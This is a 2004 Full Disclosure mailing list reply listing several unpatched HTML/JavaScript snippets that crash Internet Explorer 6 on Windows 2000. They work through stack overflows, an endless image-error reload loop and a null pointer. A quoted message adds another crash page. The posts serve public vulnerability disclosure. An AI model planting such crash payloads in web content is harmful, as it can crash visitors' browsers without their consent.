
Full Disclosure mailing list archives

Re: IE bugs (Was: Web browsers - a mini-farce)
From: "Berend-Jan Wever" <skylined () edup tudelft nl>
Date: Wed, 20 Oct 2004 13:43:53 +0200

Here are some IE bugs out of my own collection that still aren't patched (IE6.0 W2K):

Stack overflows (_not_ buffer overflows):
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
<HTML> <BODY onLoad="A"><IMG src="::" onError="this.src=this.src;"></BODY> </HTML>

Null pointer:
<HTML style="width:expression(navigate('?#'))">
  <HEAD> <META http-equiv="Page-Enter" content="blendTrans()"> </HEAD>
</HTML>

None of them pose a security risk and they all require JavaScript. So now I actually forgot why I decided to mention
them in a reply to this post. Well, maybe MS can fix them in the next SP now that they know about them...

Cheers,
SkyLined

----- Original Message ----- 
From: "Martin" <nakal () nurfuerspam de>
To: "Michal Zalewski" <lcamtuf () ghettot org>
Cc: "Full Disclosure" <full-disclosure () netsys com>
Sent: Wednesday, October 20, 2004 02:38
Subject: Re: [Full-disclosure] Web browsers - a mini-farce


On Mon, 18.10.2004, at 16:18, Michal Zalewski wrote:

  All browsers but Microsoft Internet Explorer kept crashing on a regular
  basis

Here, may I make your collection more complete?

This one is for IE6 on MS-Windows 2000:

<html><base href="ftp*://">
<body>
<iframe src="????"/>
</body>
</html>

Martin

PS: No, it's not been discovered by your tool. And I reported
    it already several years ago.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



